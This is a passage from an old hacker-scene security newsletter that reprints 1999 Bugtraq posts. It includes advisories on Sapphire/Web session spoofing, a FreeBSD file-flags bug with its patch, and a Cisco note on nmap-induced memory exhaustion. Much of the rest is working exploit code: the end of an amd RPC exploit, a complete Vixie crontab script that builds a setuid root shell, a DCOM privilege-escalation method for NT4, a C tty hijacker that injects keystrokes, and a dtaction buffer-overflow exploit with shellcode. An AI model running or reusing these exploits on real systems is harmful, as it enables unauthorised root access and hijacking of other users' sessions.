(XDRPROC_T_TYPE) xdr_int, (caddr_t) & res,
TIMEOUT) != RPC_SUCCESS) {
printf ( "voce e' um hax0r!\n");
printf ( "don't forget to restart amd: /etc/rc.d/init.d/amd start\n");
clnt_perror ( clnt, "clnt_call");
return (NULL);
}
printf ( "exploit failed\n");
return (&res);
}
---------------------------------------
-condor
www.sekure.org
s e k u r e
pgp key available at condor.sekure.org/condor.asc
@HWA
44.0 Spoofed Id in Bluestone Sapphire/Web
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: [Security] Spoofed Id in Bluestone Sapphire/Web
To: BUGTRAQ@SECURITYFOCUS.COM
INTRINsec Security Advisory
Release Date : September 02, 1999
Software : Bluestone Sapphire/Web V5
Operating System: Solaris
Impact : The attacker can access the session of other connected clients.
Author : Gerald.Grevrend@INTRINsec.com
Status : Bluestone is advised from this.
URLs : http://www.INTRINsec.com
__ Diggest __
Sapphire/Web is a framework for iCommerce platforms. This product has a
security flaw in its authentication scheme that allows an attacker
to easily usurpate the identity of the currently connected clients.
Bluestone is advised from this and wont correct this bug.
__ Technical Details and Exploits __
To authenticate its clients, Sapphire/Web uses an id stored in a session
cookie as authentication scheme. After you have sent your login/password,
Sapphire/Web sends you back a session cookie containing your id for this
session.
There are two flaws in their id authentication scheme :
- the id is higly predictable : it is a counter incremented one by one,
so given your id, it is easy to guess the id of people connected just before
you.
- the id longs all your session : it isn't renewed at each http request,
so you are sure that if the session hasn't been disconnected, its id is
valid.
All the attacker has to do is to connect to Sapphire/Web server with a valid
login/password and note its id. Then he can make a request with a decreased
id in its cookie.
With some luck, he will access the session of another client.
__ Solutions __
Bluestone doesn't provide a patch for this problem. You have to upgrade your
software to the new version (V6.X) that allows you to use your own
authentication scheme.
__ Contacts __
-- Bluestone Software --
Support Services
1000 Briggs Road
Mount Laurel, New Jersey 08054-4101
Phone: 856.778.7900
Fax: 856.234.2877
support@bluestone.com
http://www.bluestone.com
-- INTRINsec --
INTRINsec is a French Security Specialist.
http://www.INTRINsec.com
This advisory is available in french.
Cet avis est disponible en francais sur notre site.
__ DISCLAMERS __
INTRINsec DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, AND PROVIDED
THESES INFORMATIONS "AS IS" WITHOUT WARRANTY OF ANY KIND. INTRINsec IS NOT
LIABLE FOR ANY DAMAGES WHATSOEVER EVEN IF INTRINsec HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.
--
Gerald Grevrend : Securite Informatique
http://www.INTRINsec.com
@HWA
45.0 FreeBSD-SA-99:01: BSD File Flags and Programming Techniques
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: [security-officer@FreeBSD.ORG: FreeBSD-SA-99:01: BSD File Flags
and Programming Techniques]
To: BUGTRAQ@SECURITYFOCUS.COM
[security-officer@FreeBSD.ORG 1.ems Content-Type: text/plain; charset=us-ascii
*** PGP Signature Status: unknown
*** Signer: Unknown, Key ID xBE7497F1
*** Signed: 9/3/99 11:38:10 PM
*** Verified: 9/13/99 2:37:02 PM
*** BEGIN PGP VERIFIED MESSAGE ***
----- Forwarded message from security-officer@FreeBSD.ORG -----
Delivered-To: freebsd-announce@freebsd.org
From: security-officer@FreeBSD.ORG
To: freebsd-announce@FreeBSD.ORG
Cc: security-notifications@FreeBSD.ORG
Subject: FreeBSD-SA-99:01: BSD File Flags and Programming Techniques
Date: Fri, 03 Sep 1999 23:29:36 -0600
X-Loop: FreeBSD.org
Precedence: bulk
-----BEGIN PGP SIGNED MESSAGE-----
=============================================================================
FreeBSD-SA-99:01 Security Advisory
FreeBSD, Inc.
Topic: BSD File Flags and Programming Techniques
Category: core
Module: kernel
Announced: 1999-09-04
Affects: FreeBSD 3.2 (and earlier)
FreeBSD-current before the correction date.
Corrected: FreeBSD-3.3 RELEASE
FreeBSD-current as of 1999/08/02
FreeBSD-3.2-stable as of 1999/08/02
FreeBSD-2.2.8-stable as of 1999/08/04
FreeBSD only: NO
Patches: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-99:01/
I. Background
BSD 4.4 added various flags to files in the file system. These flags
control various aspects of which operations are permitted on those
files. Historically, root has been been able to do all of these
operations so many programs that knew they were running as root didn't
check to make sure that these operations succeeded.
II. Problem Description
A user can set flags and mode on the device which they logged into.
Since a bug in login and other similar programs causes the normal
chown to fail, this first user will own the terminal of any login.
III. Impact
Local users can execute a man-in-the-middle attack against any other
user (including root) when the other users logs in. This give them
the ability to snoop and alter all text that the user writes. Results
of this include the ability to execute commands as the user, and
stealing the user's password (and anything else the users writes over
the connection, including passwords for other machines).
IV. Workaround
None.
V. Solution
FreeBSD-current
Index: kern/vfs_syscalls.c
===================================================================
RCS file: /home/imp/FreeBSD/CVS/src/sys/kern/vfs_syscalls.c,v
retrieving revision 1.125
retrieving revision 1.128
diff -u -r1.125 -r1.128
--- vfs_syscalls.c 1999/07/29 17:02:56 1.125
+++ vfs_syscalls.c 1999/08/04 04:52:18 1.128
@@ -1892,13 +1892,23 @@
int error;
struct vattr vattr;
+ /*
+ * Prevent non-root users from setting flags on devices. When
+ * a device is reused, users can retain ownership of the device
+ * if they are allowed to set flags and programs assume that
+ * chown can't fail when done as root.
+ */
+ if ((vp->v_type == VCHR || vp->v_type == VBLK) &&
+ ((error = suser_xxx(p->p_ucred, p, PRISON_ROOT)) != 0))
+ return (error);
+
VOP_LEASE(vp, p, p->p_ucred, LEASE_WRITE);
vn_lock(vp, LK_EXCLUSIVE | LK_RETRY, p);
VATTR_NULL(&vattr);
vattr.va_flags = flags;
error = VOP_SETATTR(vp, &vattr, p->p_ucred, p);
VOP_UNLOCK(vp, 0, p);
- return error;
+ return (error);
}
/*
FreeBSD-3.2-stable
Index: kern/vfs_syscalls.c
===================================================================
RCS file: /home/imp/FreeBSD/CVS/src/sys/kern/vfs_syscalls.c,v
retrieving revision 1.112.2.3
retrieving revision 1.112.2.5
diff -u -r1.112.2.3 -r1.112.2.5
--- vfs_syscalls.c 1999/07/30 01:07:23 1.112.2.3
+++ vfs_syscalls.c 1999/08/11 21:39:50 1.112.2.5
@@ -1839,13 +1839,23 @@
int error;
struct vattr vattr;
+ /*
+ * Prevent non-root users from setting flags on devices. When
+ * a device is reused, users can retain ownership of the device
+ * if they are allowed to set flags and programs assume that
+ * chown can't fail when done as root.
+ */
+ if ((vp->v_type == VCHR || vp->v_type == VBLK) &&
+ ((error = suser(p->p_ucred, &p->p_acflag)) != 0))
+ return (error);
+
VOP_LEASE(vp, p, p->p_ucred, LEASE_WRITE);
vn_lock(vp, LK_EXCLUSIVE | LK_RETRY, p);
VATTR_NULL(&vattr);
vattr.va_flags = flags;
error = VOP_SETATTR(vp, &vattr, p->p_ucred, p);
VOP_UNLOCK(vp, 0, p);
- return error;
+ return (error);
}
/*
FreeBSD 2.2.8-stable:
Index: kern/vfs_syscalls.c
===================================================================
RCS file: /home/imp/FreeBSD/CVS/src/sys/kern/vfs_syscalls.c,v
retrieving revision 1.51.2.7
retrieving revision 1.51.2.8
diff -u -r1.51.2.7 -r1.51.2.8
--- vfs_syscalls.c 1998/07/03 03:50:31 1.51.2.7
+++ vfs_syscalls.c 1999/08/04 18:58:56 1.51.2.8
@@ -1439,6 +1439,17 @@
if (error)
return (error);
vp = nd.ni_vp;
+ if ((error = VOP_GETATTR(vp, &vattr, p->p_ucred, p)))
+ return (error);
+ /*
+ * Prevent non-root users from setting flags on devices. When
+ * a device is reused, users can retain ownership of the device
+ * if they are allowed to set flags and programs assume that
+ * chown can't fail when done as root.
+ */
+ if ((vp->v_type == VCHR || vp->v_type == VBLK) &&
+ ((error = suser(p->p_ucred, &p->p_acflag)) != 0))
+ return (error);
LEASE_CHECK(vp, p, p->p_ucred, LEASE_WRITE);
VOP_LOCK(vp);
VATTR_NULL(&vattr);
VI. Credits
Theo de Raadt came up with the firewalling solution presented here.
lumpy@blue.9mm.com brought this problem to light.
=============================================================================
FreeBSD, Inc.
Web Site: http://www.freebsd.org/
Confidential contacts: security-officer@freebsd.org
Security notifications: security-notifications@freebsd.org
Security public discussion: freebsd-security@freebsd.org
PGP Key: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/public_key.asc
Notice: Any patches in this document may not apply cleanly due to
modifications caused by digital signature or mailer software.
Please reference the URL listed at the top of this document
for original copies of all patches if necessary.
=============================================================================
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface
iQCVAwUBN9CAHFUuHi5z0oilAQEJPwP/XhzCOs4ipJkZIPWlSDvsvPLcJWXzb3HK
Fs8gLV3CPnW7YdSpveosI3hBY9WNCVAFx9WkM5+n+FBSRfbRzFJkkblN85ZCz7pI
+RXg6Sv5vuzy6SRxMRK2vu1FXuwZevVQaMq4ANUXpdo5MyUE8rMGb9PLWdxOxdf5
s6zlG0oFyvI=
=CqoX
-----END PGP SIGNATURE-----
This is the moderated mailing list freebsd-announce.
The list contains announcements of new FreeBSD capabilities,
important events and project milestones.
See also the FreeBSD Web pages at http://www.freebsd.org
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-announce" in the body of the message
----- End forwarded message -----
--
Patrick Oonk - PO1-6BONE - patrick@pine.nl - www.pine.nl/~patrick
Pine Internet B.V. PGP key ID BE7497F1
Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/
-- Pine Security Digest - http://security.pine.nl/ (Dutch) ----
Excuse of the day: Your Flux Capacitor has gone bad.
*** END PGP VERIFIED MESSAGE ***
@HWA
46.0 Cisco and Nmap Dos
~~~~~~~~~~~~~~~~~~
Subject: Re: Cisco and Nmap Dos
To: BUGTRAQ@SECURITYFOCUS.COM
Hi all,
I wanted to address the items listed here. We are still investigating this problem,
and hope to have more information later on in the week. Item 1, OSPF is not an issue.
According to the configuration information provided to us by the customer, OSPF is
not in use. Items 2, 3 & 4. IOS actually handles ARP in the following manner: When
we receive a packet destined for something not already in our ARP table, we enter an
"incomplete" entry in the ARP table. Then we will rate limit ARPs to once every 2
seconds to that destination. Any additional packets to that same destination will
be dropped until the ARP entry is completed. This is on a per destination basis.
"Incompletes" (ARP requests that have not been responded to) get dropped after
approximately 1 minute from the last time we sent an ARP request for that non
existent address.
Incomplete entries MAY stay around longer, as the process that is responsible for
cleaning up the ARP table may not have enough time to complete before it is called
again, if we have a lot to clean up, which may be relevant to this case.
The incomplete entries will eventually get cleaned up, but it may take two or three
minutes, two or three cycles of the process that cleans up the table. Under a dedicated,
intense nmap scan, a very large number of ARP requests may be generated, causing the
ARP table to grow very large with "incomplete" entries. These entries consume memory.
As the amount of free memory declines and demand on the processor to handle outstanding
packets increases, ARP processing falls behind and throughput on the router may decline
significantly. Once the scan is stopped, processing catches up and things return to normal.
So, to my knowledge IOS should be doing the right thing, we only queue one ARP request at
a time, every 2 seconds, until the ARP entry is resolved, we rate limit requests, dropping
all additional packets, until the ARP entry is resolved, and we clean up the outstanding
incomplete requests within a few minutes. I hope that helps address some of the concerns put
forth. Hopefully we will have further updates shortly.
Thank you,
Lisa Napier
Product Security Incident Response Team
Cisco Systems
At 04:04 PM 9/2/1999 +0200, Mikael Olsson wrote:
>There could be a couple of problems that I know of...
>
>The problem(s) here may be
>1) OSPF : Remembering every single IP as separate routes.
> I don't know the timeouts or memory usage for OSPF
> routes, so I won't try to dig to deep into that. This should be
> easily verifiable by just checking the routing table on
> the router, should it be the case.
>2) ARP resolution : Any number of packets to the same IP may be
> queued, instead of just one per IP which is the sane thing to do.
>3) ARP resolution : There are no checks to see if there's a huge
> number of requests waiting. If there is, the router should just
> kill old requests.
>4) ARP resolution : The router remembers not only addresses that have
> been found,
> but also addresses that could NOT be found. This way, it
> doesn't keep retrying several times per second but rather
> once every 10-30 seconds (if someone still wants to talk to that
> host, of course).
> Here, the problem may be that it doesn't delete old "not found"
> records if there's a disproportionate amount of them.
>
>The most probable one is number one.
>
>If you don't want the gory details in this discussion,
>skip to </boringtechstuff>.
>The conclusion is more interesting than the math.
>
><boringtechstuff>
>
>
>Let's do some math on the ARP part:
>
>Assume that all hosts are local to the router.
>It took you 18 hours to complete 256^3 = 16M addresses.
>16M hosts in 18 hours (64800 secs) means 250 hosts scanned per second.
>
>This would amount to app. 100 kbps load (assuming each host is only
>pinged once). This doesn't make any sense, but I'll go ahead anyway :-)
>
>First we look at the case where packets are buffered.
>
>Assume the router buffers packets with unknown destination for
>one second.
>Each buffer would be 14 ether + 20 ip + 8 icmp + 4 data = 46
>bytes, plus internal data such as mbuf-equivalent links. Let's
>assume each buffer eats 64 bytes.
>64 * 250 = 16K used on average.
>Hmm this does not seem to be the case. Even assuming nmap pings
>four times per host and that each packet is buffered for
>three seconds, it would only amount to 192K.
>
>Let's look at remembering ARP entries that are not found.
>Assume each ARP entry eats 4 ip + 6 ether + 2 timeout + 2 flags
>+ 2 bytes proto type + 2 byte hw type + ~8 bytes hash bucket
>linkage (or something) = 26 bytes.
>Assume each entry lives for 30 seconds.
>250 * 30 * 26 = 195K.
>Even with IPv6 address size allocation and long timeouts,
>it doesn't amount to more than a couple of megs.
>
>Ack..
>
>Even with both combined, it doesn't even come near to 35 MB.
>
>A quick look at the OSPF problem would say
>so la la 20 bytes per route, route life time of 1 hour:
>1 million hosts scanned per hour, 20 bytes per route,
>gives an AVERAGE OF TWENTY MB RAM USED.
>
>This would seem more probable.
>
>By starting a scan and seeing how the memory grows, you
>should see that it keeps growing for maybe 30 minutes,
>maybe 1 hour, maybe 2 hours (route life) and then stays
>at the same level.
>When you stop scanning, it should take the same time
>for the memory usage to decrease to normal levels.
>
></boringtechstuff>
>
>Either there's a flaw in the routing kernel that I have no
>idea about, or the problem is OSPF.
>
>As I said, you should be able to verify OSPF behaviour either
>by checking the routing table from the console, or polling
>it via SNMP. I've noticed on some brands that the console
>only displays static and RIPped routes, but that SNMP
>displays all; keep that in mind.
>
>You should be able to amend this problem by adding static
>routes without destination for IP spans known to be empty.
>
>Hope this helps?
>Regards,
>Mikael Olsson
>
>
>"Lancashire, Andrew" wrote:
> >
> > I don't know if you've ever seen this before. We ran nmap with ICMP
> > discover and standard tcp scan. We ran the scan against the entire 10.0.0.0
> > network range. Although we were only looking for 2 ports, we found that the
> > RSM in our 5500 series (our default route) was running out of memory and
> > had to be rebooted by our Network Services group multiple times in the 18
> > hour stretch it took to complete. One of the interesting things is that we
> > were only generating about 3-5 Mbs and the 5500 can pass Gigabits. I have
> > not heard of this problem before. We contacted Cisco and sent them the
> > details. Below is the response to one of our engineers.
> >
> > Andrew
> >
> > -----Original Message-----
> > From: khollis [SMTP:khollis@cisco.com]
> > Sent: Tuesday, August 31, 1999 7:59 AM
> > To: wescotd@sutterhealth.org
> > Subject: Regarding Case Number V44290
> >
> > Hi Dave, as I recall, the symptom we had to work/troubleshoot with was the
> > router consumed lots of memory. Never heard about packets being dropped. So
> > it seems like we forwarded everything nmap sent to us. The thing to keep in
> > mind is that the router will dynamically allocate memory as necessary so
> > that it can keep up with the load provided to it. Although we did not know
> > nmap was running at the time, we noticed the memory consumed by the IP Input
> > process dropped from 40M+ to an acceptable level of (4-5M) after nmap was
> > shut down. This proves that the router need this much memory to process the
> > entire load generated by nmap.
> >
> > I suspect nmap was doing much more than you've been able to calculate. It's
> > obvious that running nmap continuously for 18-19 hours caused this problem.
> > One possible explaination is constantly flooding the router w/64 byte
> > packets for this timeframe could have caused the router's memory to become
> > seriously fragmented. Also, I guess we can't tell, but another question
> > would be how many tcp sessions were requested/open on the router after this
> > timeframe?
> >
> > Port scanners have a reputation of helping identify potential security
> > problems. However, they are also known to cause problems...
> >
> > Hope this helps,
> > KennyH.
>
>--
>Mikael Olsson, EnterNet Sweden AB, Box 393, S-891 28 ÖRNSKÖLDSVIK
>Phone: +46-(0)660-105 50 Fax: +46-(0)660-122 50
>WWW: http://www.enternet.se E-mail: mikael.olsson@enternet.se
@HWA
47.0 Vixie Crontab exploit code
~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: Vixie Crontab exploit code
To: BUGTRAQ@SECURITYFOCUS.COM
Vixie Crontab exploit code
begin vixie-ex
----------------------------------------------------------------------
#!/bin/sh
# Vixie crontab exploit
#
# Local user can gain root access.
#
# Tested redhat linux : 4.2, 5.0, 5.1, 6.0
# Tested vixie crontab version : 3.0.1
#
# This program is only for demonstrative use only.
# USE IT AT YOUR OWN RISK!
#
# Programmed by Taeho Oh 1999/08/31
#
# Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara
# PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus
# PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
export PATH
echo
echo "Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara"
echo "PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus"
echo "PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug"
echo
echo make shell
echo
cat > /tmp/sh.c << EOF
#include<unistd.h>
#include<stdlib.h>
int main()
{
setuid(0);
setgid(0);
execl("/bin/sh","sh",0);
return 0;
}
EOF
echo compile shell
echo
cc -o /tmp/sh /tmp/sh.c || gcc -o /tmp/sh /tmp/sh.c
echo make execute shell script
echo
cat > /tmp/makesh << EOF
#!/bin/sh
chown root /tmp/sh
chgrp root /tmp/sh
chmod 4755 /tmp/sh
EOF
chmod 755 /tmp/makesh
echo hack sendmail.cf
echo
cp -f /etc/sendmail.cf /tmp/sendmail.cf.tmp1
sed 's/O DefaultUser=8:12/O DefaultUser=0:0/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf
sed 's/P=\/usr\/bin\/procmail/P=\/tmp\/makesh/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf.tmp2
sed 's/A=procmail/A=makesh/g' /tmp/sendmail.cf.tmp2 > /tmp/sendmail.cf.tmp3
cp /tmp/sendmail.cf.tmp3 /tmp/sendmail.cf
rm -f /tmp/sendmail.cf.tmp1
rm -f /tmp/sendmail.cf.tmp2
rm -f /tmp/sendmail.cf.tmp3
echo make cron file
echo
cat > /tmp/cronfile << EOF
MAILTO=-C/tmp/sendmail.cf `whoami`
* * * * * ls
EOF
echo input cron file
echo
crontab /tmp/cronfile
echo wait for 1 minute
echo
sec=`date +%S`
wait=`expr 65 - $sec`
sleep $wait
echo execute shell
echo
/tmp/sh
echo delete data files
echo
cd /tmp
rm -f sendmail.cf cronfile makesh sh.c
crontab /dev/null
----------------------------------------------------------------------
end vixie-ex
--
Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus
PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug
@HWA
48.0 Exploiting DCOM to gain Administrative rights on Windows NT 4
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: Exploiting DCOM to gain Administrative rights on Windows NT 4
To: BUGTRAQ@SECURITYFOCUS.COM
By using a combination of problems it is a relatively easy matter for a
local user to gain administrative rights on a Windows NT 4 Server or
Workstation,
though this situation is easily rectifiable.
1) The default configuration permissions on Windows NT allow the Interactive
User,
that is the user currently logged on, to make modifications to the way a
DCOM
server should be run. Basically this means they can modify the subkeys under
the HKCR\AppID registry key where information pertaining to the way these
servers
should be run is stored. Choosing an example that'll be on the majority of
machines
consider Wordpad. Wordpad is a registered DCOM server. By navigating to the
HKCR\AppID\{73FDDC80-AEA9-101A-98A7-00AA00374959}
registry key and adding a new value, "LocalService", and supplying the name
of a system
service a normal user will be able to start (a service) one of their
choosing.
2) After an install of certain software by an administrator new system
services can
be registered, but not necessarily started automatically. Added to this the
NTFS rights
on the service's image file may be lax. Consider an install of Internet
Explorer 5.
A system service, the System Event Notification service or SENS, is
registered under
the HKLM\CurrentControlSet\Services registry key but is not started. The
default NTFS
rights allow Everybody to overwrite the file.
Overwriting a service's image file with an "exploit" and getting it to run
as system is hardly brain
surgery, in so far as using it in a way to leverage more access to a system
is concerned
anyway. The problem lies in trying to get the service to run - a normal user
just can't
open the Services Control Panel applet and start a service.
Enter DCOM - stage right. Using a simple VBScript in an HTML document, such
as
<SCRIPT LANGUAGE="VBScript">
CreateObject("Wordpad.Document.1")
</SCRIPT>
an opening it will cause the browser request of the COM Service Control
Manager (RPCSS.EXE) that it start
the server so it can create an instance of the wordpad.document.1 class.
RPCSS looks at the
HKCR\AppID\{73FDDC80-AEA9-101A-98A7-00AA00374959}
key and decides how to start it. Going back to stage 1) above let's assume
we supplied "SENS" as the data
for the LocalService we added. RPCSS will go ahead and start the SENS
service because the default launch
permissions allow the Interactive User to do so.
All that this takes is for one of the HKCR\AppID registry key to have the
default permissions and for
a normal user to be able to overwrite one .exe or .dll that a non-started
system service uses for an
NT system to be vulnerable.
Needless to say tightening the permissions of the relevant keys and files
will resolve this problem.
NB ~ Windows 2000 will allow Power Users, Server Operators etc to gain Admin
rights using similar methods.
Cheers,
David Litchfield
http://www.arca.com
http://www.infowar.co.uk/mnemonix
@HWA
49.0 linux tty hijacker by typo/teso
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#include <sys/ioctl.h>
#include <sys/types.h>
#include <signal.h>
#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#include <termios.h>
// Dirty H(ijacker|arry) by typo/teso.. paralell tailing and ioctl input
// don't work.. neither does nonblocking tailing. any suggestions on how
// to improve this ? -> typo@scene.at
// credits: Saegfault for some ideas regarding the tail mode.
char *moo;
int fd;
void inthand() {
printf("moo!\n");
free(moo);
close(fd);
exit(-1);
}
int main(int argc, char **argv) {
char *moo2;
printf("-- Dirty H(ijacker|arry) by typo/teso --\n");
if (argc<2) {
printf("Usage: %s </dev/ttyx> [tailmode]\n",argv[0]);
exit(-1);
}
signal(SIGINT, (void*)&inthand);
moo2 = moo = (char *)malloc(400);
if (argc>2) {
fd = open(argv[1], O_RDONLY|O_SYNC);
printf("Tailing %s""... all commands we receive won't reach the shell:\n", argv[1]);
while (1) {
read(fd,moo,1);
printf("%s",moo);
if (!strcmp(moo,"\r"))
printf("\n");
fflush(stdout);
}
} else {
fd = open(argv[1], O_WRONLY);
printf("Inserting Commands into %s"":\n", argv[1]);
while (1) {
moo = moo2;
fgets(moo, 400, stdin);
while (*moo)
ioctl(fd, TIOCSTI, moo++);
}
}
}
@HWA
50.0 Various Vulnerabilities in CDE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#1 Dtaction
Subject: Vulnerability in dtaction
To: BUGTRAQ@SECURITYFOCUS.COM
Hello,
I discovered the following security problem in dtaction, part of CDE:
Description
-----------
/usr/dt/bin/dtaction contains a buffer overflow when a username of more than
1024 bytes is supplied as an argument.
Impact
------
The buffer overflow can lead to local root compromise.
Workaround
----------
dtaction allows local or remote invocation of an 'Action' as any user. This
is why dtaction is setuid root. If this feature is not needed the setuid bits
can be removed:
as root type: chmod 555 /usr/dt/bin/dtaction
dtaction can then still be used to invoke local and remote 'Actions' as the
user invoking dtaction.
Affected systems
----------------
Although the overflow is present in most implementations, exploiting it is
very much system dependent. Below an example exploit for Solaris 7 x86 is
is given.
The only systems I have checked were:
Solaris 7, 2.6, 2.5.1
Background
----------
Despite the fact that Georgi Gunski found a buffer overflow in dtaction in
1997, no-one apparently checked dtaction any further. The overflow that was
discovered then appeared to be due to a bug in the shared library libDtSvc.so,
which was subsequently fixed. Even though the Sun Security Bulletin 164 at
that time said:
Due to insufficient bounds checking on arguments supplied
to dtaction, it is possible to overwrite the internal stack space of
dtaction. As dtaction is setuid root, this vulnerability may be
exploited to gain root access.
Apparently not all user supplied arguments were checked.
Supplying a username over 1024 with the argument -user will overflow an
internal buffer used to log a message to /var/adm/sulog. Although the
overflow can succeed, a message will always be logged to /var/adm/sulog.
The overflow is in a function called AddSuLog, which is called from a function
LogFailure, which in turn is called from a function UnknownUser:
The code at the end of the routine UnkownUser() looks like this (all on
Solaris 2.6):
UnknownUser+0x025c: call LogFailure
UnknownUser+0x0260: nop
UnknownUser+0x0264: call 0x00023904 [unresolved PLT 54: XmStringFree]
UnknownUser+0x0268: mov %i3, %o0
UnknownUser+0x026c: call 0x00023904 [unresolved PLT 54: XmStringFree]
UnknownUser+0x0270: mov %i2, %o0
UnknownUser+0x0274: call 0x00023910 [unresolved PLT 55: XtFree]
UnknownUser+0x0278: mov %i4, %o0
UnknownUser+0x027c: sethi %hi(0x23c00), %o0
UnknownUser+0x0280: call 0x000237a8 [unresolved PLT 25: XtAppMainLoop]
UnknownUser+0x0284: ld [%o0 + 0x3c4], %o0
UnknownUser+0x0288: ret
UnknownUser+0x028c: restore
According to the discription of XtAppMainLoop, it will never return. This will
make the overflow not exploitable on systems where the return address on the
stack is for the caller of the caller (like sparc). However, when we inspect
the function XtAppMainLoop on Solaris 2.6 we find:
XtAppMainLoop : save %sp, -0xc0, %sp
XtAppMainLoop+0x0004: tst %i0
XtAppMainLoop+0x0008: be XtAppMainLoop+0x30
XtAppMainLoop+0x000c: add %fp, -0x60, %o1
XtAppMainLoop+0x0010: ld [%i0 + 0x224], %o0
XtAppMainLoop+0x0014: tst %o0
XtAppMainLoop+0x0018: be XtAppMainLoop+0x30
XtAppMainLoop+0x001c: add %fp, -0x60, %o1
XtAppMainLoop+0x0020: ld [%i0 + 0x224], %o1
XtAppMainLoop+0x0024: jmpl %o1, %o7
XtAppMainLoop+0x0028: mov %i0, %o0
XtAppMainLoop+0x002c: add %fp, -0x60, %o1
XtAppMainLoop+0x0030: call 0xef5a193c [unresolved PLT 181:
XtAppNextEvent]
XtAppMainLoop+0x0034: mov %i0, %o0
XtAppMainLoop+0x0038: call 0xef5a1948 [unresolved PLT 182:
XtDispatchEvent]
XtAppMainLoop+0x003c: add %fp, -0x60, %o0
XtAppMainLoop+0x0040: ldsb [%i0 + 0x21c], %o0
XtAppMainLoop+0x0044: tst %o0
XtAppMainLoop+0x0048: be XtAppMainLoop+0x30
XtAppMainLoop+0x004c: add %fp, -0x60, %o1
XtAppMainLoop+0x0050: tst %i0
XtAppMainLoop+0x0054: be XtAppMainLoop+0x78
XtAppMainLoop+0x0058: nop
XtAppMainLoop+0x005c: ld [%i0 + 0x228], %o0
XtAppMainLoop+0x0060: tst %o0
XtAppMainLoop+0x0064: be XtAppMainLoop+0x78
XtAppMainLoop+0x0068: nop
XtAppMainLoop+0x006c: ld [%i0 + 0x228], %o1
XtAppMainLoop+0x0070: jmpl %o1, %o7
XtAppMainLoop+0x0074: mov %i0, %o0
XtAppMainLoop+0x0078: ret
XtAppMainLoop+0x007c: restore
It seems that this function might end if a certain test fails. It is unclear
if this is a test under control of the user.
Below is a simple C program which shows the problem on Solaris 7 x86, which
has a stack with the return address of the caller on it.
Regards,
Job
---
Job de Haas job@itsx.com
ITSX bv http://www.itsx.com
-------8<-----------------------------------------------------------------
/*
* dtaction_ov.c
* Job de Haas
* (c) ITSX bv 1999
*
* This program demonstrates an overflow problem in /usr/dt/bin/dtaction.
* It has only been tested on Solaris 7 x86
* assembly code has been taken from ex_dtprintinfo86.c by unewn4th@usa.net
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <pwd.h>
#define BUFLEN 998
char exploit_code[] =
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33"
"\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88"
"\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f"
"\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46"
"\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01"
"\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/id";
main()
{
char *argp[6], *envp[3];
char buf[2048];
unsigned long *p;
struct passwd *pw;
int buflen;
if ((pw = getpwuid(getuid())) == NULL) {
perror("getpwuid");
exit(1);
}
buflen = BUFLEN - strlen( pw->pw_name );
memset(buf,0x90,buflen);
strncpy( &buf[500], exploit_code, strlen(exploit_code));
/* set some pointers to values that keep code running */
p = (unsigned long *)&buf[buflen];
*p++ = 0x37dc779b;
*p++ = 0xdfaf6502;
*p++ = 0x08051230;
*p++ = 0x080479b8;
/* the return address. */
*p++ = 0x08047710;
*p = 0;
argp[0] = strdup("/usr/dt/bin/dtaction");
argp[1] = strdup("-u");
argp[2] = strdup(buf);
argp[3] = strdup("Run");
argp[4] = strdup("/usr/bin/id");
argp[5] = NULL;
if (!getenv("DISPLAY")) {
printf("forgot to set DISPLAY\n");
exit(1);
}
envp[0] = malloc( strlen("DISPLAY=")+strlen(getenv("DISPLAY"))+1);
strcpy(envp[0],"DISPLAY=");
strcat(envp[0],getenv("DISPLAY"));
envp[1] = NULL;
execve("/usr/dt/bin/dtaction",argp,envp);
}
********************************************************************************
#2, DTsession
Subject: Vulnerability in dtsession
To: BUGTRAQ@SECURITYFOCUS.COM
Hello,
